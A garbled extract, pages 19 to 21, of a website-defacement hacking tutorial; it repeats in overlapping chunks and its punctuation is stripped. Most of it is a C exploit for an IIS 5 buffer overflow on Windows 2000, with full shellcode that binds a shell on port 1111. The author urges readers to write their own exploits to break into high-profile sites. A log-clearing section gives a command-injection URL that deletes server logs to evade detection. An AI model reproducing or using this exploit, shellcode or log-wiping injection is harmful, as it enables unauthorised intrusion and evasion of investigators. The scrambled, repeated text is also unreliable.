x2cx8bx45x94x89x47x38x8bx45x98x89x47x40x89x47x3c
xb8xf0xffxffxffx33xdbx03xe0x8bxc4x50x8dx85x38xff
xffxffx50x53x53x53x6ax01x53x53x8dx4dx80x51x53xff
x55xf0x33xc0xb4x04x50x6ax40xffx95x34xffxffxffx89
x85x30xffxffxffx90x33xdbx53x8dx85x2cxffxffxffx50
x53x53x53xffx75x9cxffx55xecx8bx85x2cxffxffxffx85
xc0x74x49x33xdbx53xb7x04x8dx85x2cxffxffxffx50x53
xffxb5x30xffxffxffxffx75x9cxffx55xe8x85xc0x74x6d
x33xc0x50xffxb5x2cxffxffxffxffxb5x30xffxffxffxff
x75xc0xffx55xccx83xf8xffx74x53xebx10x90x90x90x90
x90x90x6ax32xffx95x28xffxffxffxebx99x90x90x33xc0
x50xb4x04x50xffxb5x30xffxffxffxffx75xc0xffx55xc8
x83xf8xffx74x28x89x85x2cxffxffxffx33xc0x50x8dx85
x2cxffxffxffx50xffxb5x2cxffxffxffxffxb5x30xffxff
xffxffx75x90xffx55xe4x85xc0x74x02xebxb4xffx75xc4
xffx95x1cxffxffxffxffx75xc0xffx95x1cxffxffxffx6a
xffxffx95x18xffxffxff
char s1=POST HTTP11rn
char s2=Accept rn
char s4=Content-Type applicationx-www-
form-urlencodedrn
char s5=Transfer-Encoding
chunkedrnrn
char sc=0rnrnrn
char shellcodebuff[10248]
memset(shellcodebuff0x90sizeof
(shellcodebuff))
memcpy(ampshellcodebuff[sizeof(shellcodebuff)-
strlen(shellcode)-1]shellcodestrlen(shellcode))
shellcodebuff[sizeof(shellcodebuff)-1] = 0
char sendbuff[102416]
memset(sendbuff0102416)
sprintf(sendbuffsss HTTP11rnsHost
srnss10rnsrn4rnAAAArn4rnBBBBrns s1 destFile
shellcodebuff s2 destIP s4s 5 padsrcdatajmpaddr sc)
int sendlen=strlen(sendbuff)
(DWORD )strstr(sendbuffBBBB) = jmpaddr
(DWORD )strstr(sendbuffAAAA) = srcdata
result=send(ssendbuffsendlen0)
if(result == -1 )
puts(Send shellcode error)
return -1
memset(buff04096)
result=recv(sbuffsizeof(buff)0)
if(strstr(bufflthtmlgt) = NULL)
shutdown(s0)
closesocket(s)
puts(Send shellcode errorTry again)
return -1
shutdown(s0)
closesocket(s)
printf(nUse lttelnet s 1111gt to connect to the hostndestIP)
puts(If you cannot connect to the hosttry run this program again)
return 0
IMPLEMENTATION OF THE CODE
To implement the C code you must compile it and run Now you
must be wondering what is the use of this code Actually the C
code causes an overflow in IIS on Windows 2000 and commands
the system to bind a shell to the source Ip on port 1111 So once
the exploit works there will be a shell bind on port 1111 on the
target system To workout you must telnet the target IP into port
1111 through this you will be connected to the system without
any kind of authentication
Various Security Measures
Website defacement has become a terrible problem for IT
(Information Technology) based companies Everyday thousands
of websites are defaced Well even Government websites are
defaced for different reasons the most common reason is cyber
war Like in reality there are wars between two rival countries
similarly in wired world there are cyber wars
If you want to see the web attack archive visit the following site
httpdefacedalldasorg
Now some security measures for the system administrators
- First of all you must coordinate and organize your web root
with suitable directories What I mean to say is that you must
organize your files like images in an image directory one for
server side contents and so on so forth If you donrsquot configure your
web root properly then your web server will be prone to many
attacks
- You must be aware of the latest vulnerabilities visit these sites
httpwwwsecurityfocuscom
httpwwwpacketstormorg
httpwwwguininskicom
httpwwwinsecureorg
httpwwwsecuriteamcom
httpwwwslashdotorg
httpwwwtechnotroniccom
Well every web server is vulnerable but you must not fear you
must download the latest patches for the particular vulnerability
Well the last thing is that you must be able to predict the moves
of a malicious cracker or a script kiddie You need to know how a
cracker breaks into your site or web server you need to know the
motive behind the attack and you must think act and work like a
hacker and take the cracker out from the root
So this completes my tutorial on Defacing websites I hope you
have understood the involutions of web servers
Edit By S433D_ONLY_LINUX AND HACKFIRE TEAM
Page 19
xabx32xc0xaaxb8x77x73x6fx63xabxb8x6bx33x32x2exab
x4fx32xc0xaax8dx7dx80xb8x63x6dx64x2exabx32xc0x4f
xaaxb8x23x80xe7x77x8dx9dx10xffxffxffx53xffxd0x89
x45xfcxb8x23x80xe7x77x8dx9dx19xffxffxffx53xffxd0
x89x45xf8xbbx4bx56xe7x77x6ax47xffx75xfcxffxd3x89
x45xf4x6ax48xffx75xfcxffxd3x89x45xf0x33xf6x66xbe
x1dx02x56xffx75xfcxffxd3x89x45xecx66xbex3ex02x56
xffx75xfcxffxd3x89x45xe8x66xbex0fx03x56xffx75xfc
xffxd3x89x45xe4x66xbex9dx01x56xffx75xfcxffxd3x89
x85x34xffxffxffx66xbexc4x02x56xffx75xfcxffxd3x89
x85x28xffxffxffx33xc0xb0x8dx50xffx75xfcxffxd3x89
x85x18xffxffxffx6ax73xffx75xf8xffxd3x89x45xe0x6a
x17xffx75xf8xffxd3x89x45xdcx6ax02xffx75xf8xffxd3
x89x45xd8x33xc0xb0x0ex48x50xffx75xf8xffxd3x89x45
xd4x6ax01xffx75xf8xffxd3x89x45xd0x6ax13xffx75xf8
xffxd3x89x45xccx6ax10xffx75xf8xffxd3x89x45xc8x6a
x03xffx75xf8xffxd3x89x85x1cxffxffxffx8dx7dxa0x32
xe4xb0x02x66xabx66xb8x04x57x66xabx33xc0xabxf7xd0
xabxabx8dx7dx8cx33xc0xb0x0exfexc8xfexc8xabx33xc0
xabx40xabx8dx45xb0x50x33xc0x66xb8x01x01x50xffx55
xe0x33xc0x50x6ax01x6ax02xffx55xdcx89x45xc4x6ax10
x8dx45xa0x50xffx75xc4xffx55xd8x6ax01xffx75xc4xff
x55xd4x33xc0x50x50xffx75xc4xffx55xd0x89x45xc0x33
xffx57x8dx45x8cx50x8dx45x98x50x8dx45x9cx50xffx55
xf4x33xffx57x8dx45x8cx50x8dx45x90x50x8dx45x94x50
xffx55xf4xfcx8dxbdx38xffxffxffx33xc9xb1x44x32xc0
xf3xaax8dxbdx38xffxffxffx33xc0x66xb8x01x01x89x47
x2cx8bx45x94x89x47x38x8bx45x98x89x47x40x89x47x3c
xb8xf0xffxffxffx33xdbx03xe0x8bxc4x50x8dx85x38xff
xffxffx50x53x53x53x6ax01x53x53x8dx4dx80x51x53xff
x55xf0x33xc0xb4x04x50x6ax40xffx95x34xffxffxffx89
x85x30xffxffxffx90x33xdbx53x8dx85x2cxffxffxffx50
x53x53x53xffx75x9cxffx55xecx8bx85x2cxffxffxffx85
xc0x74x49x33xdbx53xb7x04x8dx85x2cxffxffxffx50x53
xffxb5x30xffxffxffxffx75x9cxffx55xe8x85xc0x74x6d
x33xc0x50xffxb5x2cxffxffxffxffxb5x30xffxffxffxff
x75xc0xffx55xccx83xf8xffx74x53xebx10x90x90x90x90
x90x90x6ax32xffx95x28xffxffxffxebx99x90x90x33xc0
x50xb4x04x50xffxb5x30xffxffxffxffx75xc0xffx55xc8
x83xf8xffx74x28x89x85x2cxffxffxffx33xc0x50x8dx85
x2cxffxffxffx50xffxb5x2cxffxffxffxffxb5x30xffxff
xffxffx75x90xffx55xe4x85xc0x74x02xebxb4xffx75xc4
xffx95x1cxffxffxffxffx75xc0xffx95x1cxffxffxffx6a
xffxffx95x18xffxffxff
char s1=POST HTTP11rn
char s2=Accept rn
char s4=Content-Type applicationx-www-
form-urlencodedrn
char s5=Transfer-Encoding
chunkedrnrn
char sc=0rnrnrn
char shellcodebuff[10248]
memset(shellcodebuff0x90sizeof
(shellcodebuff))
memcpy(ampshellcodebuff[sizeof(shellcodebuff)-
strlen(shellcode)-1]shellcodestrlen(shellcode))
shellcodebuff[sizeof(shellcodebuff)-1] = 0
char sendbuff[102416]
memset(sendbuff0102416)
sprintf(sendbuffsss HTTP11rnsHost
srnss10rnsrn4rnAAAArn4rnBBBBrns s1 destFile
shellcodebuff s2 destIP s4s 5 padsrcdatajmpaddr sc)
int sendlen=strlen(sendbuff)
(DWORD )strstr(sendbuffBBBB) = jmpaddr
(DWORD )strstr(sendbuffAAAA) = srcdata
result=send(ssendbuffsendlen0)
if(result == -1 )
puts(Send shellcode error)
return -1
memset(buff04096)
result=recv(sbuffsizeof(buff)0)
if(strstr(bufflthtmlgt) = NULL)
shutdown(s0)
closesocket(s)
puts(Send shellcode errorTry again)
return -1
shutdown(s0)
closesocket(s)
printf(nUse lttelnet s 1111gt to connect to the hostndestIP)
puts(If you cannot connect to the hosttry run this program again)
return 0
The above code is called as an exploit code these are written in
powerful programming languages like C Perl or sometimes JAVA
Exploit Codes are written according to the vulnerability
Vulnerabilities were discovered in the past nowadays it has been
seen that server softwares and operating systems are patched for
these vulnerabilities So you canrsquot just execute exploit code to
break into a server you must overwork an exploit code so that it
works according to your needs One more thing I must mention is
that you must keep yourself updated with latest vulnerabilities by
visiting the sites that I have mentioned earlier in the tutorial
Well I think its better that you code your own exploit code in Perl
or C in order to break into websites
NOTE I am talking about high profile websites I am not talking
about lame websites coded in notepad
Keeping yourself safe
Well you must be familiar with server softwares like Apache
Microsoft IIS etc So you must be knowing about the log files
which records each and every request made by the server As it
records everything system administrators will have no problem
catching the malicious cracker or script kiddie as the log file will
have the IP (Internet Protocol) address and through the IP
address you can trace the cracker or the script kiddie
NOTE Read my tutorial on Gathering Information of Remote Host
TIP If you do not want to get busted you must clear the log files
after you break into a web server
CLEARING LOGS
You must clear yoursquore the logs in order to save yourself from
getting busted So you can use cross site scripting vulnerability
to clear the log files You can do by executing the following URL
httpwwwtargetcomcgi-bintest-cgibat|DEL+log
NOTE The above URL can be used in Apache server software
In case of IIS on Windows 2000 you can use the following method
to get a DOS Shell through telnet
The Following code exploits a buffer overflow in IIS 5 on Windows
2000 server and opens port 1111 and binds a shell to it If the
exploit is successful then all you have to do is use telnet to
connect to port 1111 of target and the system is yours
Windows 2000 Server Exploit By CHINANSL Security Team
Test on Windows 2000 Chinese Version IIS 50 not patched
WarningTHIS PROGRAM WILL ONLY TEST
CHINANSL Technology COLTD httpwwwchinanslcom
kejichinanslcom
include stdafxh
include ltstdiohgt
include ltstdlibhgt
include ltstringhgt
include ltwindowshgt
pragma comment (libWs2_32)
int main(int argc char argv[])
if(argc = 4)
printf(s ip port aspfilepathnnargv[0])
printf( ie s 127001 80 iisstartaspnargv[0])
puts( programed by kejichinanslcom)
return 0
DWORD srcdata=0x01e2fb1c-40x00457474
address of SHELLCODE
DWORD jmpaddr=0x00457494 0x77ebf094 0x01e6fcec
x1cxfbxe6x01 x0cxfbxe6x01
char destIP=argv[1]
char destFile=argv[3]
int webport=atoi(argv[2])
char pad=xccxccxccxcc ADPA x02x02x02x02 PADP 16 bytes
WSADATA ws
SOCKET s
long result=0
if(WSAStartup(0x0101ampws) = 0)
puts(WSAStartup() error)
return -1
struct sockaddr_in addr
addrsin_family=AF_INET
addrsin_port=htons(webport)
addrsin_addrs_addr=inet_addr(destIP)
s=socket(AF_INETSOCK_STREAM0)
if(s==-1)
puts(Socket create error)
return -1
if(connect(s(struct sockaddr )ampaddrsizeof(addr)) == -1)
puts(Cannot connect to the specified host)
return -1
char buff[4096]
char
shellcode=x55x8bxecx33xc0xb0xf0xf7xd8x03xe0x8bxfcx33xc9x8
9
x8dx2cxffxffxffxb8x6bx65x72x6exabxb8x65x6cx33x32
xabx32xc0xaaxb8x77x73x6fx63xabxb8x6bx33x32x2exab
x4fx32xc0xaax8dx7dx80xb8x63x6dx64x2exabx32xc0x4f
xaaxb8x23x80xe7x77x8dx9dx10xffxffxffx53xffxd0x89
x45xfcxb8x23x80xe7x77x8dx9dx19xffxffxffx53xffxd0
x89x45xf8xbbx4bx56xe7x77x6ax47xffx75xfcxffxd3x89
x45xf4x6ax48xffx75xfcxffxd3x89x45xf0x33xf6x66xbe
x1dx02x56xffx75xfcxffxd3x89x45xecx66xbex3ex02x56
xffx75xfcxffxd3x89x45xe8x66xbex0fx03x56xffx75xfc
xffxd3x89x45xe4x66xbex9dx01x56xffx75xfcxffxd3x89
x85x34xffxffxffx66xbexc4x02x56xffx75xfcxffxd3x89
x85x28xffxffxffx33xc0xb0x8dx50xffx75xfcxffxd3x89
x85x18xffxffxffx6ax73xffx75xf8xffxd3x89x45xe0x6a
x17xffx75xf8xffxd3x89x45xdcx6ax02xffx75xf8xffxd3
x89x45xd8x33xc0xb0x0ex48x50xffx75xf8xffxd3x89x45
xd4x6ax01xffx75xf8xffxd3x89x45xd0x6ax13xffx75xf8
xffxd3x89x45xccx6ax10xffx75xf8xffxd3x89x45xc8x6a
x03xffx75xf8xffxd3x89x85x1cxffxffxffx8dx7dxa0x32
xe4xb0x02x66xabx66xb8x04x57x66xabx33xc0xabxf7xd0
xabxabx8dx7dx8cx33xc0xb0x0exfexc8xfexc8xabx33xc0
xabx40xabx8dx45xb0x50x33xc0x66xb8x01x01x50xffx55
xe0x33xc0x50x6ax01x6ax02xffx55xdcx89x45xc4x6ax10
x8dx45xa0x50xffx75xc4xffx55xd8x6ax01xffx75xc4xff
x55xd4x33xc0x50x50xffx75xc4xffx55xd0x89x45xc0x33
xffx57x8dx45x8cx50x8dx45x98x50x8dx45x9cx50xffx55
xf4x33xffx57x8dx45x8cx50x8dx45x90x50x8dx45x94x50
xffx55xf4xfcx8dxbdx38xffxffxffx33xc9xb1x44x32xc0
xf3xaax8dxbdx38xffxffxffx33xc0x66xb8x01x01x89x47
x2cx8bx45x94x89x47x38x8bx45x98x89x47x40x89x47x3c
xb8xf0xffxffxffx33xdbx03xe0x8bxc4x50x8dx85x38xff
xffxffx50x53x53x53x6ax01x53x53x8dx4dx80x51x53xff
x55xf0x33xc0xb4x04x50x6ax40xffx95x34xffxffxffx89
x85x30xffxffxffx90x33xdbx53x8dx85x2cxffxffxffx50
x53x53x53xffx75x9cxffx55xecx8bx85x2cxffxffxffx85
xc0x74x49x33xdbx53xb7x04x8dx85x2cxffxffxffx50x53
xffxb5x30xffxffxffxffx75x9cxffx55xe8x85xc0x74x6d
x33xc0x50xffxb5x2cxffxffxffxffxb5x30xffxffxffxff
x75xc0xffx55xccx83xf8xffx74x53xebx10x90x90x90x90
x90x90x6ax32xffx95x28xffxffxffxebx99x90x90x33xc0
x50xb4x04x50xffxb5x30xffxffxffxffx75xc0xffx55xc8
x83xf8xffx74x28x89x85x2cxffxffxffx33xc0x50x8dx85
x2cxffxffxffx50xffxb5x2cxffxffxffxffxb5x30xffxff
xffxffx75x90xffx55xe4x85xc0x74x02xebxb4xffx75xc4
xffx95x1cxffxffxffxffx75xc0xffx95x1cxffxffxffx6a
xffxffx95x18xffxffxff
char s1=POST HTTP11rn
char s2=Accept rn
char s4=Content-Type applicationx-www-
form-urlencodedrn
char s5=Transfer-Encoding
chunkedrnrn
char sc=0rnrnrn
char shellcodebuff[10248]
memset(shellcodebuff0x90sizeof
(shellcodebuff))
memcpy(ampshellcodebuff[sizeof(shellcodebuff)-
strlen(shellcode)-1]shellcodestrlen(shellcode))
shellcodebuff[sizeof(shellcodebuff)-1] = 0
char sendbuff[102416]
memset(sendbuff0102416)
sprintf(sendbuffsss HTTP11rnsHost
srnss10rnsrn4rnAAAArn4rnBBBBrns s1 destFile
shellcodebuff s2 destIP s4s 5 padsrcdatajmpaddr sc)
int sendlen=strlen(sendbuff)
(DWORD )strstr(sendbuffBBBB) = jmpaddr
(DWORD )strstr(sendbuffAAAA) = srcdata
result=send(ssendbuffsendlen0)
if(result == -1 )
puts(Send shellcode error)
return -1
memset(buff04096)
result=recv(sbuffsizeof(buff)0)
if(strstr(bufflthtmlgt) = NULL)
shutdown(s0)
closesocket(s)
puts(Send shellcode errorTry again)
return -1
shutdown(s0)
closesocket(s)
printf(nUse lttelnet s 1111gt to connect to the hostndestIP)
puts(If you cannot connect to the hosttry run this program again)
return 0
IMPLEMENTATION OF THE CODE
To implement the C code you must compile it and run Now you
must be wondering what is the use of this code Actually the C
code causes an overflow in IIS on Windows 2000 and commands
the system to bind a shell to the source Ip on port 1111 So once
the exploit works there will be a shell bind on port 1111 on the
target system To workout you must telnet the target IP into port
1111 through this you will be connected to the system without
any kind of authentication
Various Security Measures
Website defacement has become a terrible problem for IT
(Information Technology) based companies Everyday thousands
of websites are defaced Well even Government websites are
defaced for different reasons the most common reason is cyber
war Like in reality there are wars between two rival countries
similarly in wired world there are cyber wars
If you want to see the web attack archive visit the following site
httpdefacedalldasorg
Now some security measures for the system administrators
- First of all you must coordinate and organize your web root
with suitable directories What I mean to say is that you must
organize your files like images in an image directory one for
server side contents and so on so forth If you donrsquot configure your
web root properly then your web server will be prone to many
attacks
- You must be aware of the latest vulnerabilities visit these sites
httpwwwsecurityfocuscom
httpwwwpacketstormorg
httpwwwguininskicom
httpwwwinsecureorg
httpwwwsecuriteamcom
httpwwwslashdotorg
httpwwwtechnotroniccom
Well every web server is vulnerable but you must not fear you
must download the latest patches for the particular vulnerability
Well the last thing is that you must be able to predict the moves
of a malicious cracker or a script kiddie You need to know how a
cracker breaks into your site or web server you need to know the
motive behind the attack and you must think act and work like a
hacker and take the cracker out from the root
So this completes my tutorial on Defacing websites I hope you
have understood the involutions of web servers
Edit By S433D_ONLY_LINUX AND HACKFIRE TEAM
Page 20
x55xf0x33xc0xb4x04x50x6ax40xffx95x34xffxffxffx89
x85x30xffxffxffx90x33xdbx53x8dx85x2cxffxffxffx50
x53x53x53xffx75x9cxffx55xecx8bx85x2cxffxffxffx85
xc0x74x49x33xdbx53xb7x04x8dx85x2cxffxffxffx50x53
xffxb5x30xffxffxffxffx75x9cxffx55xe8x85xc0x74x6d
x33xc0x50xffxb5x2cxffxffxffxffxb5x30xffxffxffxff
x75xc0xffx55xccx83xf8xffx74x53xebx10x90x90x90x90
x90x90x6ax32xffx95x28xffxffxffxebx99x90x90x33xc0
x50xb4x04x50xffxb5x30xffxffxffxffx75xc0xffx55xc8
x83xf8xffx74x28x89x85x2cxffxffxffx33xc0x50x8dx85
x2cxffxffxffx50xffxb5x2cxffxffxffxffxb5x30xffxff
xffxffx75x90xffx55xe4x85xc0x74x02xebxb4xffx75xc4
xffx95x1cxffxffxffxffx75xc0xffx95x1cxffxffxffx6a
xffxffx95x18xffxffxff
char s1=POST HTTP11rn
char s2=Accept rn
char s4=Content-Type applicationx-www-
form-urlencodedrn
char s5=Transfer-Encoding
chunkedrnrn
char sc=0rnrnrn
char shellcodebuff[10248]
memset(shellcodebuff0x90sizeof
(shellcodebuff))
memcpy(ampshellcodebuff[sizeof(shellcodebuff)-
strlen(shellcode)-1]shellcodestrlen(shellcode))
shellcodebuff[sizeof(shellcodebuff)-1] = 0
char sendbuff[102416]
memset(sendbuff0102416)
sprintf(sendbuffsss HTTP11rnsHost
srnss10rnsrn4rnAAAArn4rnBBBBrns s1 destFile
shellcodebuff s2 destIP s4s 5 padsrcdatajmpaddr sc)
int sendlen=strlen(sendbuff)
(DWORD )strstr(sendbuffBBBB) = jmpaddr
(DWORD )strstr(sendbuffAAAA) = srcdata
result=send(ssendbuffsendlen0)
if(result == -1 )
puts(Send shellcode error)
return -1
memset(buff04096)
result=recv(sbuffsizeof(buff)0)
if(strstr(bufflthtmlgt) = NULL)
shutdown(s0)
closesocket(s)
puts(Send shellcode errorTry again)
return -1
shutdown(s0)
closesocket(s)
printf(nUse lttelnet s 1111gt to connect to the hostndestIP)
puts(If you cannot connect to the hosttry run this program again)
return 0
The above code is called as an exploit code these are written in
powerful programming languages like C Perl or sometimes JAVA
Exploit Codes are written according to the vulnerability
Vulnerabilities were discovered in the past nowadays it has been
seen that server softwares and operating systems are patched for
these vulnerabilities So you canrsquot just execute exploit code to
break into a server you must overwork an exploit code so that it
works according to your needs One more thing I must mention is
that you must keep yourself updated with latest vulnerabilities by
visiting the sites that I have mentioned earlier in the tutorial
Well I think its better that you code your own exploit code in Perl
or C in order to break into websites
NOTE I am talking about high profile websites I am not talking
about lame websites coded in notepad
Keeping yourself safe
Well you must be familiar with server softwares like Apache
Microsoft IIS etc So you must be knowing about the log files
which records each and every request made by the server As it
records everything system administrators will have no problem
catching the malicious cracker or script kiddie as the log file will
have the IP (Internet Protocol) address and through the IP
address you can trace the cracker or the script kiddie
NOTE Read my tutorial on Gathering Information of Remote Host
TIP If you do not want to get busted you must clear the log files
after you break into a web server
CLEARING LOGS
You must clear yoursquore the logs in order to save yourself from
getting busted So you can use cross site scripting vulnerability
to clear the log files You can do by executing the following URL
httpwwwtargetcomcgi-bintest-cgibat|DEL+log
NOTE The above URL can be used in Apache server software
In case of IIS on Windows 2000 you can use the following method
to get a DOS Shell through telnet
The Following code exploits a buffer overflow in IIS 5 on Windows
2000 server and opens port 1111 and binds a shell to it If the
exploit is successful then all you have to do is use telnet to
connect to port 1111 of target and the system is yours
Windows 2000 Server Exploit By CHINANSL Security Team
Test on Windows 2000 Chinese Version IIS 50 not patched
WarningTHIS PROGRAM WILL ONLY TEST
CHINANSL Technology COLTD httpwwwchinanslcom
kejichinanslcom
include stdafxh
include ltstdiohgt
include ltstdlibhgt
include ltstringhgt
include ltwindowshgt
pragma comment (libWs2_32)
int main(int argc char argv[])
if(argc = 4)
printf(s ip port aspfilepathnnargv[0])
printf( ie s 127001 80 iisstartaspnargv[0])
puts( programed by kejichinanslcom)
return 0
DWORD srcdata=0x01e2fb1c-40x00457474
address of SHELLCODE
DWORD jmpaddr=0x00457494 0x77ebf094 0x01e6fcec
x1cxfbxe6x01 x0cxfbxe6x01
char destIP=argv[1]
char destFile=argv[3]
int webport=atoi(argv[2])
char pad=xccxccxccxcc ADPA x02x02x02x02 PADP 16 bytes
WSADATA ws
SOCKET s
long result=0
if(WSAStartup(0x0101ampws) = 0)
puts(WSAStartup() error)
return -1
struct sockaddr_in addr
addrsin_family=AF_INET
addrsin_port=htons(webport)
addrsin_addrs_addr=inet_addr(destIP)
s=socket(AF_INETSOCK_STREAM0)
if(s==-1)
puts(Socket create error)
return -1
if(connect(s(struct sockaddr )ampaddrsizeof(addr)) == -1)
puts(Cannot connect to the specified host)
return -1
char buff[4096]
char
shellcode=x55x8bxecx33xc0xb0xf0xf7xd8x03xe0x8bxfcx33xc9x8
9
x8dx2cxffxffxffxb8x6bx65x72x6exabxb8x65x6cx33x32
xabx32xc0xaaxb8x77x73x6fx63xabxb8x6bx33x32x2exab
x4fx32xc0xaax8dx7dx80xb8x63x6dx64x2exabx32xc0x4f
xaaxb8x23x80xe7x77x8dx9dx10xffxffxffx53xffxd0x89
x45xfcxb8x23x80xe7x77x8dx9dx19xffxffxffx53xffxd0
x89x45xf8xbbx4bx56xe7x77x6ax47xffx75xfcxffxd3x89
x45xf4x6ax48xffx75xfcxffxd3x89x45xf0x33xf6x66xbe
x1dx02x56xffx75xfcxffxd3x89x45xecx66xbex3ex02x56
xffx75xfcxffxd3x89x45xe8x66xbex0fx03x56xffx75xfc
xffxd3x89x45xe4x66xbex9dx01x56xffx75xfcxffxd3x89
x85x34xffxffxffx66xbexc4x02x56xffx75xfcxffxd3x89
x85x28xffxffxffx33xc0xb0x8dx50xffx75xfcxffxd3x89
x85x18xffxffxffx6ax73xffx75xf8xffxd3x89x45xe0x6a
x17xffx75xf8xffxd3x89x45xdcx6ax02xffx75xf8xffxd3
x89x45xd8x33xc0xb0x0ex48x50xffx75xf8xffxd3x89x45
xd4x6ax01xffx75xf8xffxd3x89x45xd0x6ax13xffx75xf8
xffxd3x89x45xccx6ax10xffx75xf8xffxd3x89x45xc8x6a
x03xffx75xf8xffxd3x89x85x1cxffxffxffx8dx7dxa0x32
xe4xb0x02x66xabx66xb8x04x57x66xabx33xc0xabxf7xd0
xabxabx8dx7dx8cx33xc0xb0x0exfexc8xfexc8xabx33xc0
xabx40xabx8dx45xb0x50x33xc0x66xb8x01x01x50xffx55
xe0x33xc0x50x6ax01x6ax02xffx55xdcx89x45xc4x6ax10
x8dx45xa0x50xffx75xc4xffx55xd8x6ax01xffx75xc4xff
x55xd4x33xc0x50x50xffx75xc4xffx55xd0x89x45xc0x33
xffx57x8dx45x8cx50x8dx45x98x50x8dx45x9cx50xffx55
xf4x33xffx57x8dx45x8cx50x8dx45x90x50x8dx45x94x50
xffx55xf4xfcx8dxbdx38xffxffxffx33xc9xb1x44x32xc0
xf3xaax8dxbdx38xffxffxffx33xc0x66xb8x01x01x89x47
x2cx8bx45x94x89x47x38x8bx45x98x89x47x40x89x47x3c
xb8xf0xffxffxffx33xdbx03xe0x8bxc4x50x8dx85x38xff
xffxffx50x53x53x53x6ax01x53x53x8dx4dx80x51x53xff
x55xf0x33xc0xb4x04x50x6ax40xffx95x34xffxffxffx89
x85x30xffxffxffx90x33xdbx53x8dx85x2cxffxffxffx50
x53x53x53xffx75x9cxffx55xecx8bx85x2cxffxffxffx85
xc0x74x49x33xdbx53xb7x04x8dx85x2cxffxffxffx50x53
xffxb5x30xffxffxffxffx75x9cxffx55xe8x85xc0x74x6d
x33xc0x50xffxb5x2cxffxffxffxffxb5x30xffxffxffxff
x75xc0xffx55xccx83xf8xffx74x53xebx10x90x90x90x90
x90x90x6ax32xffx95x28xffxffxffxebx99x90x90x33xc0
x50xb4x04x50xffxb5x30xffxffxffxffx75xc0xffx55xc8
x83xf8xffx74x28x89x85x2cxffxffxffx33xc0x50x8dx85
x2cxffxffxffx50xffxb5x2cxffxffxffxffxb5x30xffxff
xffxffx75x90xffx55xe4x85xc0x74x02xebxb4xffx75xc4
xffx95x1cxffxffxffxffx75xc0xffx95x1cxffxffxffx6a
xffxffx95x18xffxffxff
char s1=POST HTTP11rn
char s2=Accept rn
char s4=Content-Type applicationx-www-
form-urlencodedrn
char s5=Transfer-Encoding
chunkedrnrn
char sc=0rnrnrn
char shellcodebuff[10248]
memset(shellcodebuff0x90sizeof
(shellcodebuff))
memcpy(ampshellcodebuff[sizeof(shellcodebuff)-
strlen(shellcode)-1]shellcodestrlen(shellcode))
shellcodebuff[sizeof(shellcodebuff)-1] = 0
char sendbuff[102416]
memset(sendbuff0102416)
sprintf(sendbuffsss HTTP11rnsHost
srnss10rnsrn4rnAAAArn4rnBBBBrns s1 destFile
shellcodebuff s2 destIP s4s 5 padsrcdatajmpaddr sc)
int sendlen=strlen(sendbuff)
(DWORD )strstr(sendbuffBBBB) = jmpaddr
(DWORD )strstr(sendbuffAAAA) = srcdata
result=send(ssendbuffsendlen0)
if(result == -1 )
puts(Send shellcode error)
return -1
memset(buff04096)
result=recv(sbuffsizeof(buff)0)
if(strstr(bufflthtmlgt) = NULL)
shutdown(s0)
closesocket(s)
puts(Send shellcode errorTry again)
return -1
shutdown(s0)
closesocket(s)
printf(nUse lttelnet s 1111gt to connect to the hostndestIP)
puts(If you cannot connect to the hosttry run this program again)
return 0
IMPLEMENTATION OF THE CODE
To implement the C code you must compile it and run Now you
must be wondering what is the use of this code Actually the C
code causes an overflow in IIS on Windows 2000 and commands
the system to bind a shell to the source Ip on port 1111 So once
the exploit works there will be a shell bind on port 1111 on the
target system To workout you must telnet the target IP into port
1111 through this you will be connected to the system without
any kind of authentication
Various Security Measures
Website defacement has become a terrible problem for IT
(Information Technology) based companies Everyday thousands
of websites are defaced Well even Government websites are
defaced for different reasons the most common reason is cyber
war Like in reality there are wars between two rival countries
similarly in wired world there are cyber wars
If you want to see the web attack archive visit the following site
httpdefacedalldasorg
Now some security measures for the system administrators
- First of all you must coordinate and organize your web root
with suitable directories What I mean to say is that you must
organize your files like images in an image directory one for
server side contents and so on so forth If you donrsquot configure your
web root properly then your web server will be prone to many
attacks
- You must be aware of the latest vulnerabilities visit these sites
httpwwwsecurityfocuscom
httpwwwpacketstormorg
httpwwwguininskicom
httpwwwinsecureorg
httpwwwsecuriteamcom
httpwwwslashdotorg
httpwwwtechnotroniccom
Well every web server is vulnerable but you must not fear you
must download the latest patches for the particular vulnerability
Well the last thing is that you must be able to predict the moves
of a malicious cracker or a script kiddie You need to know how a
cracker breaks into your site or web server you need to know the
motive behind the attack and you must think act and work like a
hacker and take the cracker out from the root
So this completes my tutorial on Defacing websites I hope you
have understood the involutions of web servers
Edit By S433D_ONLY_LINUX AND HACKFIRE TEAM
Page 21
char sendbuff[102416]
memset(sendbuff0102416)
sprintf(sendbuffsss HTTP11rnsHost
srnss10rnsrn4rnAAAArn4rnBBBBrns s1 destFile
shellcodebuff s2 destIP s4s 5 padsrcdatajmpaddr sc)
int sendlen=strlen(sendbuff)
(DWORD )strstr(sendbuffBBBB) = jmpaddr
(DWORD )strstr(sendbuffAAAA) = srcdata
result=send(ssendbuffsendlen0)
if(result == -1 )
puts(Send shellcode error)
return -1
memset(buff04096)
result=recv(sbuffsizeof(buff)0)
if(strstr(bufflthtmlgt) = NULL)
shutdown(s0)
closesocket(s)
puts(Send shellcode errorTry again)
return -1
shutdown(s0)
closesocket(s)
printf(nUse lttelnet s 1111gt to connect to the hostndestIP)
puts(If you cannot connect to the hosttry run this program again)
return 0
The above code is called as an exploit code these are written in
powerful programming languages like C Perl or sometimes JAVA
Exploit Codes are written according to the vulnerability
Vulnerabilities were discovered in the past nowadays it has been
seen that server softwares and operating systems are patched for
these vulnerabilities So you canrsquot just execute exploit code to
break into a server you must overwork an exploit code so that it
works according to your needs One more thing I must mention is
that you must keep yourself updated with latest vulnerabilities by
visiting the sites that I have mentioned earlier in the tutorial
Well I think its better that you code your own exploit code in Perl
or C in order to break into websites
NOTE I am talking about high profile websites I am not talking
about lame websites coded in notepad
Keeping yourself safe
Well you must be familiar with server softwares like Apache
Microsoft IIS etc So you must be knowing about the log files
which records each and every request made by the server As it
records everything system administrators will have no problem
catching the malicious cracker or script kiddie as the log file will
have the IP (Internet Protocol) address and through the IP
address you can trace the cracker or the script kiddie
NOTE Read my tutorial on Gathering Information of Remote Host
TIP If you do not want to get busted you must clear the log files
after you break into a web server
CLEARING LOGS
You must clear yoursquore the logs in order to save yourself from
getting busted So you can use cross site scripting vulnerability
to clear the log files You can do by executing the following URL
httpwwwtargetcomcgi-bintest-cgibat|DEL+log
NOTE The above URL can be used in Apache server software
